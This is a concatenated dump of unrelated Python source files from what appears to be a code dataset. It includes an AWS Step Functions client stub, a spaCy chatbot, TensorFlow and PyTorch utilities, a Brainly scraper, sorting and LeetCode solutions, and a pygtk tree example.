'name': 'string',
'status': 'RUNNING'|'SUCCEEDED'|'FAILED'|'TIMED_OUT'|'ABORTED',
'startDate': datetime(2015, 1, 1),
'stopDate': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **executions** *(list) --*
The list of matching executions.
- *(dict) --*
Contains details about an execution.
- **executionArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the execution.
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) of the executed state machine.
- **name** *(string) --*
The name of the execution.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **status** *(string) --*
The current status of the execution.
- **startDate** *(datetime) --*
The date the execution started.
- **stopDate** *(datetime) --*
If the execution already ended, the date the execution stopped.
- **nextToken** *(string) --*
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine whose executions is listed.
:type statusFilter: string
:param statusFilter:
If specified, only list the executions whose current execution status matches the given filter.
:type maxResults: integer
:param maxResults:
The maximum number of results that are returned per call. You can use ``nextToken`` to obtain further pages of results. The default is 100 and the maximum allowed page size is 1000. A value of 0 uses the default.
This is only an upper limit. The actual number of results returned per call might be fewer than the specified maximum.
:type nextToken: string
:param nextToken:
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:rtype: dict
:returns:
"""
pass
def list_state_machines(self, maxResults: int = None, nextToken: str = None) -> Dict:
"""
Lists the existing state machines.
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
.. note::
This operation is eventually consistent. The results are best effort and may not reflect very recent updates and changes.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/ListStateMachines>`_
**Request Syntax**
::
response = client.list_state_machines(
maxResults=123,
nextToken='string'
)
**Response Syntax**
::
{
'stateMachines': [
{
'stateMachineArn': 'string',
'name': 'string',
'creationDate': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **stateMachines** *(list) --*
- *(dict) --*
Contains details about the state machine.
- **stateMachineArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the state machine.
- **name** *(string) --*
The name of the state machine.
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
- **creationDate** *(datetime) --*
The date the state machine is created.
- **nextToken** *(string) --*
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:type maxResults: integer
:param maxResults:
The maximum number of results that are returned per call. You can use ``nextToken`` to obtain further pages of results. The default is 100 and the maximum allowed page size is 1000. A value of 0 uses the default.
This is only an upper limit. The actual number of results returned per call might be fewer than the specified maximum.
:type nextToken: string
:param nextToken:
If ``nextToken`` is returned, there are more results available. The value of ``nextToken`` is a unique pagination token for each page. Make the call again using the returned token to retrieve the next page. Keep all other arguments unchanged. Each pagination token expires after 24 hours. Using an expired pagination token will return an *HTTP 400 InvalidToken* error.
:rtype: dict
:returns:
"""
pass
def list_tags_for_resource(self, resourceArn: str) -> Dict:
"""
List tags for a given resource.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/ListTagsForResource>`_
**Request Syntax**
::
response = client.list_tags_for_resource(
resourceArn='string'
)
**Response Syntax**
::
{
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **tags** *(list) --*
An array of tags associated with the resource.
- *(dict) --*
Tags are key-value pairs that can be associated with Step Functions state machines and activities.
- **key** *(string) --*
The key of a tag.
- **value** *(string) --*
The value of a tag.
:type resourceArn: string
:param resourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) for the Step Functions state machine or activity.
:rtype: dict
:returns:
"""
pass
def send_task_failure(self, taskToken: str, error: str = None, cause: str = None) -> Dict:
"""
Used by workers to report that the task identified by the ``taskToken`` failed.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/SendTaskFailure>`_
**Request Syntax**
::
response = client.send_task_failure(
taskToken='string',
error='string',
cause='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type taskToken: string
:param taskToken: **[REQUIRED]**
The token that represents this task. Task tokens are generated by the service when the tasks are assigned to a worker (see GetActivityTask::taskToken).
:type error: string
:param error:
The error code of the failure.
:type cause: string
:param cause:
A more detailed explanation of the cause of the failure.
:rtype: dict
:returns:
"""
pass
def send_task_heartbeat(self, taskToken: str) -> Dict:
"""
Used by workers to report to the service that the task represented by the specified ``taskToken`` is still making progress. This action resets the ``Heartbeat`` clock. The ``Heartbeat`` threshold is specified in the state machine's Amazon States Language definition. This action does not in itself create an event in the execution history. However, if the task times out, the execution history contains an ``ActivityTimedOut`` event.
.. note::
The ``Timeout`` of a task, defined in the state machine's Amazon States Language definition, is its maximum allowed duration, regardless of the number of SendTaskHeartbeat requests received.
.. note::
This operation is only useful for long-lived tasks to report the liveliness of the task.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/SendTaskHeartbeat>`_
**Request Syntax**
::
response = client.send_task_heartbeat(
taskToken='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type taskToken: string
:param taskToken: **[REQUIRED]**
The token that represents this task. Task tokens are generated by the service when the tasks are assigned to a worker (see GetActivityTaskOutput$taskToken ).
:rtype: dict
:returns:
"""
pass
def send_task_success(self, taskToken: str, output: str) -> Dict:
"""
Used by workers to report that the task identified by the ``taskToken`` completed successfully.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/SendTaskSuccess>`_
**Request Syntax**
::
response = client.send_task_success(
taskToken='string',
output='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type taskToken: string
:param taskToken: **[REQUIRED]**
The token that represents this task. Task tokens are generated by the service when the tasks are assigned to a worker (see GetActivityTaskOutput$taskToken ).
:type output: string
:param output: **[REQUIRED]**
The JSON output of the task.
:rtype: dict
:returns:
"""
pass
def start_execution(self, stateMachineArn: str, name: str = None, input: str = None) -> Dict:
"""
Starts a state machine execution.
.. note::
``StartExecution`` is idempotent. If ``StartExecution`` is called with the same name and input as a running execution, the call will succeed and return the same response as the original request. If the execution is closed or if the input is different, it will return a 400 ``ExecutionAlreadyExists`` error. Names can be reused after 90 days.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/StartExecution>`_
**Request Syntax**
::
response = client.start_execution(
stateMachineArn='string',
name='string',
input='string'
)
**Response Syntax**
::
{
'executionArn': 'string',
'startDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **executionArn** *(string) --*
The Amazon Resource Name (ARN) that identifies the execution.
- **startDate** *(datetime) --*
The date the execution is started.
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine to execute.
:type name: string
:param name:
The name of the execution. This name must be unique for your AWS account, region, and state machine for 90 days. For more information, see `Limits Related to State Machine Executions <https://docs.aws.amazon.com/step-functions/latest/dg/limits.html#service-limits-state-machine-executions>`__ in the *AWS Step Functions Developer Guide* .
A name must *not* contain:
* whitespace
* brackets ``< > { } [ ]``
* wildcard characters ``? *``
* special characters ``\" # % \ ^ | ~ ` $ & , ; : /``
* control characters (``U+0000-001F`` , ``U+007F-009F`` )
:type input: string
:param input:
The string that contains the JSON input data for the execution, for example:
``\"input\": \"{\\"first_name\\" : \\"test\\"}\"``
.. note::
If you don\'t include any JSON input data, you still must include the two braces, for example: ``\"input\": \"{}\"``
:rtype: dict
:returns:
"""
pass
def stop_execution(self, executionArn: str, error: str = None, cause: str = None) -> Dict:
"""
Stops an execution.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/StopExecution>`_
**Request Syntax**
::
response = client.stop_execution(
executionArn='string',
error='string',
cause='string'
)
**Response Syntax**
::
{
'stopDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **stopDate** *(datetime) --*
The date the execution is stopped.
:type executionArn: string
:param executionArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the execution to stop.
:type error: string
:param error:
The error code of the failure.
:type cause: string
:param cause:
A more detailed explanation of the cause of the failure.
:rtype: dict
:returns:
"""
pass
def tag_resource(self, resourceArn: str, tags: List) -> Dict:
"""
Add a tag to a Step Functions resource.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/TagResource>`_
**Request Syntax**
::
response = client.tag_resource(
resourceArn='string',
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type resourceArn: string
:param resourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) for the Step Functions state machine or activity.
:type tags: list
:param tags: **[REQUIRED]**
The list of tags to add to a resource.
Tags may only contain unicode letters, digits, whitespace, or these symbols: ``_ . : / = + - @`` .
- *(dict) --*
Tags are key-value pairs that can be associated with Step Functions state machines and activities.
- **key** *(string) --*
The key of a tag.
- **value** *(string) --*
The value of a tag.
:rtype: dict
:returns:
"""
pass
def untag_resource(self, resourceArn: str, tagKeys: List) -> Dict:
"""
Remove a tag from a Step Functions resource
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/UntagResource>`_
**Request Syntax**
::
response = client.untag_resource(
resourceArn='string',
tagKeys=[
'string',
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type resourceArn: string
:param resourceArn: **[REQUIRED]**
The Amazon Resource Name (ARN) for the Step Functions state machine or activity.
:type tagKeys: list
:param tagKeys: **[REQUIRED]**
The list of tags to remove from the resource.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def update_state_machine(self, stateMachineArn: str, definition: str = None, roleArn: str = None) -> Dict:
"""
Updates an existing state machine by modifying its ``definition`` and/or ``roleArn`` . Running executions will continue to use the previous ``definition`` and ``roleArn`` . You must include at least one of ``definition`` or ``roleArn`` or you will receive a ``MissingRequiredParameter`` error.
.. note::
All ``StartExecution`` calls within a few seconds will use the updated ``definition`` and ``roleArn`` . Executions started immediately after calling ``UpdateStateMachine`` may use the previous state machine ``definition`` and ``roleArn`` .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/states-2016-11-23/UpdateStateMachine>`_
**Request Syntax**
::
response = client.update_state_machine(
stateMachineArn='string',
definition='string',
roleArn='string'
)
**Response Syntax**
::
{
'updateDate': datetime(2015, 1, 1)
}
**Response Structure**
- *(dict) --*
- **updateDate** *(datetime) --*
The date and time the state machine was updated.
:type stateMachineArn: string
:param stateMachineArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the state machine.
:type definition: string
:param definition:
The Amazon States Language definition of the state machine. See `Amazon States Language <https://docs.aws.amazon.com/step-functions/latest/dg/concepts-amazon-states-language.html>`__ .
:type roleArn: string
:param roleArn:
The Amazon Resource Name (ARN) of the IAM role of the state machine.
:rtype: dict
:returns:
"""
pass
| true |
841213262645470c4f659bdb87a2cfcf36a00530 | Python | nerdyspook/Chatbot | /script.py | UTF-8 | 2,137 | 3.078125 | 3 | [] | no_license | from collections import Counter
from responses import responses, blank_spot
from user_functions import preprocess, compare_overlap, pos_tag, extract_nouns, compute_similarity
import spacy
word2vec = spacy.load('en')
exit_commands = ("quit", "goodbye", "exit", "no")
class ChatBot:
#define .make_exit() below:
def make_exit(self,user_message):
for command in exit_commands:
if command in user_message:
print("Goodbye!")
return True
#define .chat() below:
def chat(self):
user_message=input("Hello\n I am Cantina. What would You like to order?\n ")
while not self.make_exit(user_message):
user_message=self.respond(user_message)
#define .find_intent_match() below:
def find_intent_match(self, responses, user_message):
bow_user_message=Counter(preprocess(user_message))
processed_responses=[Counter(preprocess(response)) for response in responses]
similarity_list=[compare_overlap(response, bow_user_message) for response in processed_responses]
print(similarity_list)
response_index=similarity_list.index(max(similarity_list))
return responses[response_index]
#define .find_entities() below:
def find_entities(self, user_message):
tagged_user_message=pos_tag(preprocess(user_message))
message_nouns=extract_nouns(tagged_user_message)
tokens=word2vec(" ".join(message_nouns))
category=word2vec(" ".join(blank_spot))
word2vec_result=compute_similarity(tokens, category)
word2vec_result.sort(key=lambda x: x[2])
#if word2vec_result is None:
#return word2vec_result[-1][0]
#else:
#return blank_spot
return word2vec_result[-1][0]
#define .respond() below:
def respond(self, user_message):
best_response=self.find_intent_match(responses, user_message)
entity=self.find_entities(user_message)
print(best_response.format(entity))
input_message=input("Do you have another question?\n")
return input_message
#initialize ChatBot instance below:
chatbot=ChatBot()
#call .chat() method below:
chatbot.chat()
| true |
4e8ebfe4f031af43b15815c65ff4dc0bc59388aa | Python | gu-gridh/imsim | /imsim/src/data.py | UTF-8 | 1,608 | 3.171875 | 3 | [
"MIT"
] | permissive | import tensorflow as tf
from typing import *
class ImageDataset:
"""A simple wrapper around the tf.data.Dataset class.
"""
def __init__(self, dataset) -> None:
self.data = dataset
@classmethod
def from_pattern(cls, file_pattern: str):
return cls(tf.data.Dataset.list_files(file_pattern))
@classmethod
def from_files(cls, file_list: List[str]):
return cls(tf.data.Dataset.from_tensor_slices(file_list))
@staticmethod
def decode(path, new_height: int, new_width: int) -> Tuple[tf.Tensor, str]:
# load the raw data from the file as a string
img = tf.io.read_file(path)
# convert the compressed string to a 3D uint8 tensor
img = tf.io.decode_jpeg(img, channels=3)
# Resize to destination size
x = tf.image.resize_with_pad(img, new_height, new_width)
return x, path
def prepare(self, height: int, width: int, batch_size: int):
self.data = self.data.map(lambda x: ImageDataset.decode(x, height, width),
num_parallel_calls = tf.data.AUTOTUNE)\
.cache()\
.batch(batch_size)\
.prefetch(buffer_size=tf.data.AUTOTUNE)
return self
# Usage:
# height = 240
# width = 240
# batch_size = 128
# ds = ImageDataset.from_pattern("image_directory/*.jpg")
# ds = ds.map(lambda x: ImageDataset.decode(x, height, width), num_parallel_calls = tf.data.AUTOTUNE)\
# .cache()\
# .batch(batch_size)\
# .prefetch(buffer_size=tf.data.AUTOTUNE)\ | true |
edc99f50d2b22a19bb92e85c1881da6d27ba376f | Python | thanh-thuy/python | /main.py | UTF-8 | 313 | 2.96875 | 3 | [] | no_license | from datetime import datetime
def santaclaus():
today = datetime.today().strftime("%j")
ending_day_of_current_year = int(datetime.now().date().replace(month=12, day=25).strftime("%j"))
print("santa clause ", ending_day_of_current_year - int(today), "days left")
return
santaclaus()
| true |
9484cadaf8cf0263ae0b9d26490f4a9cf08e0656 | Python | oneTaken/leetcode | /easy/67.py | UTF-8 | 867 | 3.0625 | 3 | [
"Apache-2.0"
] | permissive | class Solution:
def addBinary(self, a, b):
"""
:type a: str
:type b: str
:rtype: str
"""
length = max(len(a), len(b))
# p = '{:0{}}'
a = '0' * (length - len(a)) + a
b = '0' * (length - len(b)) + b
tmp = '0'
ans = []
def char_plus(c1, c2):
if c1 == '1' and c2 == '1':
return '1', '0'
elif (c1 == '1' and c2 == '0') or (c1 == '0' and c2 == '1'):
return '0', '1'
else:
return '0', '0'
for i in range(length - 1, -1, -1):
_tmp1, _ans = char_plus(a[i], b[i])
_tmp2, _ans = char_plus(_ans, tmp)
_, tmp = char_plus(_tmp1, _tmp2)
ans.append(_ans)
if tmp == '1':
ans.append('1')
return ''.join(ans[::-1])
| true |
b2ef739a8db0b137aa6f204469d65e32d4ac0796 | Python | zheng568/DECAPS_for_COVID19 | /utils/loss_utils.py | UTF-8 | 1,895 | 2.765625 | 3 | [
"MIT"
] | permissive | import torch
import torch.nn as nn
import torch.nn.functional as F
class MarginLoss(nn.Module):
def __init__(self, args):
super(MarginLoss, self).__init__()
self.args = args
def forward(self, v_c, target):
labels = F.one_hot(target, self.args.num_classes)
present_error = F.relu(self.args.m_plus - v_c, inplace=True) ** 2 # max(0, m_plus-||v_c||)^2
absent_error = F.relu(v_c - self.args.m_minus, inplace=True) ** 2 # max(0, ||v_c||-m_minus)^2
l_c = labels.float() * present_error + self.args.lambda_val * (1. - labels.float()) * absent_error
loss = l_c.sum(dim=1).mean()
return loss
class SpreadLoss(nn.Module):
def __init__(self, args):
super(SpreadLoss, self).__init__()
self.num_class = args.num_classes
self.margin = args.m_min
def forward(self, ai, target):
b, E = ai.shape
assert E == self.num_class
at = ai[range(b), target]
at = at.view(b, 1).repeat(1, E)
zeros = ai.new_zeros(ai.shape)
loss = torch.max(self.margin - (at - ai), zeros)
loss = loss ** 2
loss = loss.sum() / b - self.margin ** 2
return loss
class CosineLoss(nn.Module):
def __init__(self, args):
super(CosineLoss, self).__init__()
self.args = args
self.cossim = nn.CosineSimilarity(dim=1, eps=1e-08)
def forward(self, f, t):
batch_size, num_head, dim = f.shape
loss = torch.mean(1 - self.cossim(f.view(-1, dim), t.view(-1, dim)))
return loss
class ReconstructionLoss(nn.Module):
def __init__(self):
super(ReconstructionLoss, self).__init__()
def forward(self, x, x_recont):
assert torch.numel(x) == torch.numel(x_recont)
x = x.view(x_recont.size()[0], -1)
reconst_loss = torch.mean((x_recont - x) ** 2)
return reconst_loss | true |
95f0f6eefb5e45743c17b94287cae79bc6032d14 | Python | jfrens/social-q-a-study | /scraper.py | UTF-8 | 2,624 | 2.90625 | 3 | [
"MIT"
] | permissive | from bs4 import BeautifulSoup
import urllib.request
import sys
if len(sys.argv) != 2:
print("Error: the username was not specified", file=sys.stderr)
sys.exit()
username = sys.argv[1]
print("Scraping data for user:" + username)
url = 'http://brainly.com/profile/' + username + '/solved'
# Build the request
# Brainly forbids requests without the User-Agent header
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'
headers = {'User-Agent': user_agent}
# Send the request and get back a big blob of Unicode HTML
req = urllib.request.Request(url, None, headers)
with urllib.request.urlopen(req) as response:
the_page = response.read()
# Pass the html to the BeautifulSoup parser
soup = BeautifulSoup(the_page, "html.parser")
# Ensure we landed on a profile page
if not soup.head.title.string.startswith("Brainly.com - User's profile"):
print("Error: did not land on a profile page")
sys.exit()
# The list of questions has an ol tag, so here we search for all such elements
for ol in soup.body.find_all('ol'):
if ol['class'][0].startswith("tasks-list"):
soup_tasks = ol
# Build a list of question urls that the user has responded
question_list = []
for div in soup_tasks.find_all('div'):
if div['class'][0].startswith("task-content"):
soup_question = div.find('a')
question_list.append(soup_question['href'])
# Parse the info for each question
for question_urlpart in question_list:
question_url = 'http://brainly.com' + question_urlpart
# Send the request and get back a big blob of Unicode HTML
req = urllib.request.Request(question_url, None, headers)
with urllib.request.urlopen(req) as response:
the_page = response.read()
# Pass the html to the BeautifulSoup parser
soup = BeautifulSoup(the_page, "html.parser")
# Find the question
question_text = ''
for string in soup.body.find('h1', class_="sg-text").strings:
question_text += string
question_text = question_text.strip()
answer_text = ''
# Find the answer
for section in soup.body.find_all(id="answers"):
for answer in section.find_all(class_="brn-answer"):
answerer = answer.find('a')['title']
answer_element = answer.find(class_="sg-text")
if (username.startswith(answerer)):
for string in answer_element.strings:
answer_text += string
answer_text = answer_text.strip()
print("\n")
print("Question: " + question_urlpart)
print(question_text.encode("utf-8"))
print("Answer: ")
print(answer_text.encode("utf-8"))
| true |
f1d4d8e446b4dd74d3cbfa0949c8d43c3cc45afe | Python | brianchun16/PythonPractices | /Lecture02/Practice2.py | UTF-8 | 257 | 3.71875 | 4 | [] | no_license | first_name = "Brian"
last_name = "Chun"
full_name = first_name + " " + last_name
#print(full_name)
my_birth_year = 2001
current_year = 2017
my_age = current_year - my_birth_year
print("My name is " + full_name + " and I am " + str(my_age) + " years old") | true |
84c87f2a237170445456b28d0ce4339f5301eb77 | Python | Hacksign/algorithm | /QuickSort.py | UTF-8 | 799 | 3.4375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/python2
#-*- coding:utf8 -*-
def quick_sort(A, low, high):
'''
快速排序算法实现
@A : array,未排序过的数组
@low : 开始排序的低位
@high : 结束排序的高位
@return : 无
@参考资料 : http://developer.51cto.com/art/201403/430986.htm
'''
if low >= high : return
key = A[low]
i = low + 1
j = high
while i < j :
while i < j and A[j] >= key : j -= 1
while i < j and A[i] <= key : i += 1
tmp = A[i]
A[i] = A[j]
A[j] = tmp
A[low] = A[i]
A[i] = key
quick_sort(A, low, i - 1)
quick_sort(A, i+ 1, high)
if __name__ == '__main__' :
unsorted_array = [2,9,1,7,7,5,6,3,4,0,8]
quick_sort(unsorted_array, 0, len(unsorted_array) - 1)
print unsorted_array
| true |
8f804ce9759fa79cf0ee9fe69bc9c3ac9464bfc9 | Python | hooyao/Coding-Py3 | /hackerrank/CrackInterview/LeftRotation.py | UTF-8 | 166 | 3.75 | 4 | [
"MIT"
] | permissive | def array_left_rotation(a, n, k):
t = k % n
return a[-(n - t):] + a[0:t]
answer = array_left_rotation([1, 2, 3, 4, 5], 5, 4)
print(*answer, sep=' ')
| true |
5e5f4b484100a2d6e1e1310a66fd4f86fe2dda11 | Python | FelixZFB/Python_data_analysis | /002_Python_data_analysis_from_entry_to_master/ch10_Numpy科学计算库/01_数组Array的属性_创建_重整_计算/007_数组计算_数组与数字.py | UTF-8 | 540 | 4.03125 | 4 | [] | no_license | # -*- coding:utf-8 -*-
# 数组计算,数组中每个值都会被计算
import numpy as np
# 生成一个一维数组
t1 = np.arange(12)
# 重写成二维数组
t2 = t1.reshape((3, 4))
# 上面可以简写为
# t2 = np.arange(12).reshape((3, 4))
print(t2)
# 乘法
t3 = t2 * 2
print()
print(t3)
# 除法,除以O,python中除以0会报错,
# 数组可以计算出结果,不会报错,会出现警告
t4 = t2 / 0
print()
print(t4)
# 输出结果:0/0=nan(not a number,不是一个数字) 2/0=inf(infinity 无限,无穷大) | true |
4c12b0b6348bb3256167968c91f839042d7919fa | Python | BasmatiBlanco/mat_leave_tracker | /Mat-leave-tracker.py | UTF-8 | 746 | 3.46875 | 3 | [] | no_license | import datetime
from datetime import timedelta
employee = input("What is employee name ")
vacation_rate = int(input("Employee Vacation Entitlement "))
vacation_ytd = int(input("Used vacation days this year "))
ml_ed = ""
ml_sd = 0
leave_length = int(input("12 or 18 month leave? "))
due_date_entry = input("What is due date (YYYY-MM-DD)")
year, month, day = map(int, due_date_entry.split("-"))
due_date = datetime.date(year, month, day)
days = (5 * vacation_rate) - vacation_ytd
ml_sd = due_date_entry + timedelta(-days)
if leave_length == 12:
days = 365
elif leave_length == 18:
days = 548
ml_ed = due_date_entry + timedelta(+days) + timedelta(vacation_rate * 5)
print("This leave starts " + ml_sd)
print("this leave ends " + ml_ed)
| true |
408ed8e69101cebe244cd53df6989d93780f8129 | Python | mahongquan/gimp-script | /pygtk/tree.py | UTF-8 | 5,225 | 3.59375 | 4 | [] | no_license | #!/usr/bin/env python
# example tree.c
import gtk
class TreeExample:
# for all the GtkItem:: and GtkTreeItem:: signals
def cb_itemsignal(self, item, signame):
# It's a Bin, so it has one child, which we know to be a
# label, so get that
label = item.children()[0]
# Get the text of the label
name = label.get()
# Get the level of the tree which the item is in
print "%s called for item %s->%s" % (signame, name, item)
# Note that this is never called
def cb_unselect_child(self, root_tree, child, subtree):
print ("unselect_child called for root tree %s, "
"subtree %s, child %s" % (root_tree, subtree, child))
# Note that this is called every time the user clicks on an item,
# whether it is already selected or not.
def cb_select_child(self, root_tree, child, subtree):
print ("select_child called for root tree %s, subtree %s, "
"child %s\n" % (root_tree, subtree, child))
def cb_selection_changed(self, tree):
print "selection_change called for tree %s" % tree
print "selected objects are:"
for item in tree.get_selection():
label = item.children()[0]
name = label.get()
print "\t%s" % name
def __init__(self):
itemnames = ["Foo", "Bar", "Baz", "Quux", "Maurice"]
# a generic toplevel window
window = gtk.GtkWindow(gtk.WINDOW_TOPLEVEL)
window.connect("delete_event", gtk.mainquit)
window.set_border_width(5)
# A generic scrolled window
scrolled_win = gtk.GtkScrolledWindow()
scrolled_win.set_policy(gtk.POLICY_AUTOMATIC,
gtk.POLICY_AUTOMATIC)
scrolled_win.set_usize(150, 200)
window.add(scrolled_win)
scrolled_win.show()
# Create the root tree
tree = gtk.GtkTree()
print "root tree is %s" % tree
# connect all GtkTree:: signals
tree.connect("select_child", self.cb_select_child, tree)
tree.connect("unselect_child", self.cb_unselect_child, tree)
tree.connect("selection_changed", self.cb_selection_changed)
# Add it to the scrolled window
scrolled_win.add_with_viewport(tree)
# Set the selection mode
tree.set_selection_mode(gtk.SELECTION_MULTIPLE)
# Show it
tree.show()
for i in range(5):
# Create a tree item
item = gtk.GtkTreeItem(itemnames[i])
# Connect all GtkItem:: and GtkTreeItem:: signals
item.connect("select", self.cb_itemsignal, "select")
item.connect("deselect", self.cb_itemsignal, "deselect")
item.connect("toggle", self.cb_itemsignal, "toggle")
item.connect("expand", self.cb_itemsignal, "expand")
item.connect("collapse", self.cb_itemsignal, "collapse")
# Add it to the parent tree
tree.append(item)
# Show it - this can be done at any time
item.show()
# Create this item's subtree
subtree = gtk.GtkTree()
print "-> item %s->%s, subtree %s" % (itemnames[i], item, subtree)
# This is still necessary if you want these signals to be called
# for the subtree's children. Note that selection_change will be
# signalled for the root tree regardless.
subtree.connect("select_child", self.cb_select_child, subtree)
subtree.connect("unselect_child", self.cb_unselect_child, subtree)
# This has absolutely no effect, because it is completely ignored
# in subtrees
subtree.set_selection_mode(gtk.SELECTION_SINGLE)
# Neither does this, but for a rather different reason - the
# view_mode and view_line values of a tree are propagated to
# subtrees when they are mapped. So, setting it later on would
# actually have a (somewhat unpredictable) effect
subtree.set_view_mode(gtk.TREE_VIEW_ITEM)
# Set this item's subtree - note that you cannot do this until
# AFTER the item has been added to its parent tree!
item.set_subtree(subtree)
for j in range(5):
# Create a subtree item, in much the same way
subitem = gtk.GtkTreeItem(itemnames[j])
# Connect all GtkItem:: and GtkTreeItem:: signals
subitem.connect("select", self.cb_itemsignal, "select")
subitem.connect("deselect", self.cb_itemsignal, "deselect")
subitem.connect("toggle", self.cb_itemsignal, "toggle")
subitem.connect("expand", self.cb_itemsignal, "expand")
subitem.connect("collapse", self.cb_itemsignal, "collapse")
print "-> -> item %s->%s\n" % (itemnames[j], subitem)
# Add it to its parent tree
subtree.append(subitem)
# Show it
subitem.show()
# Show the window and loop endlessly
window.show()
def main():
gtk.mainloop()
return 0
if __name__ == "__main__":
TreeExample()
main()
| true |
ed9980675283a89bf1ad27954dd0bdd071e89964 | Python | rasuloff/practical-python-worked | /1.7 Functions/1.33_pcost_reading_rasuloff.py | UTF-8 | 665 | 3.59375 | 4 | [] | no_license | # pcost.py
#
# Exercise 1.33: Reading from the command line
import csv
import sys
def portfolio_cost(filename):
total_cost = 0.0
with open(filename, 'rt') as f:
headers = next(f)
for line in f:
row = line.split(',')
try:
number_shares = int(row[1])
price = float(row[2])
total_cost += number_shares * price
except ValueError:
print('Warning - Error in row:', row)
return total_cost
if len(sys.argv) == 2:
filename = sys.srgv[1]
else:
filename = 'Data/portfolio.csv'
cost = portfolio_cost(filename)
print('Total Cost:', cost)
| true |
cf0079a632fe9236ef6b867f4ab6f8d3103435b3 | Python | cherryzoe/Leetcode | /371. Sum of Two Integers.py | UTF-8 | 3,963 | 3.875 | 4 | [] | no_license | # Calculate the sum of two integers a and b, but you are not allowed to use the operator + and -.
# Example:
# Given a = 1 and b = 2, return 3.
# Python 表示一个数不止32位.
# https://www.hrwhisper.me/leetcode-sum-two-integers/
# http://bookshadow.com/weblog/2016/06/30/leetcode-sum-of-two-integers/
# 因此。。做这题要保证两个数在正确的范围内(本题是int,32bit)
# 如何做到呢?我们知道32bit 可以表示的无符号整数位0~0xFFFFFFFF(全0~全1)
# 因此,我们使用&来保证该数是32bit.
# int的0和正整数范围为0~0x7FFFFFFF,int负数的范围为-0x80000000~-1,因此,大于0x7FFFFFFF的其实是最高位为1(这是符号位)。这样算出来是把最高位不当成符号位,我们还需要对负数的情况进行修正。
# 在具体实现上,我们可以先 &0x7FFFFFFF 然后取反,这样,-1变为-0x80000000(-2147483648) -2变为了-0x7FFFFFFF(-2147483647) ,因此,在^0x7FFFFFFF即可。。
# recursive solution:
# 此题不能用+号,故可以将需要用到加号的部分想象成函数。 a+b可以想象成 F(a,b) a+b可以转化成求 (subsum + carry) --> F(subsum, carry),实质上都是一样,可以用递归解决
class Solution(object):
def getSum(self, a, b):
"""
:type a: int
:type b: int
:rtype: int
"""
MASK = 0xFFFFFFFF
max_int = 0x7FFFFFFF
min_int = 0x80000000
if b == 0:
return a if a < max_int else ~(a ^ MASK)
_sum = (a ^ b) & MASK
carry = ((a & b) << 1) & MASK
return self.getSum(_sum, carry)
# Iterative solution:
class Solution(object):
def getSum(self, a, b):
"""
:type a: int
:type b: int
:rtype: int
"""
MASK = 0xFFFFFFFF
max_int = 0x7FFFFFFF
min_int = 0x80000000
while b:
a, b = (a^b) & MASK, ((a&b)<<1) & MASK
return a if a < max_int else ~(a ^ MASK)
def getSum(self, a, b):
"""
:type a: int
:type b: int
:rtype: int
"""
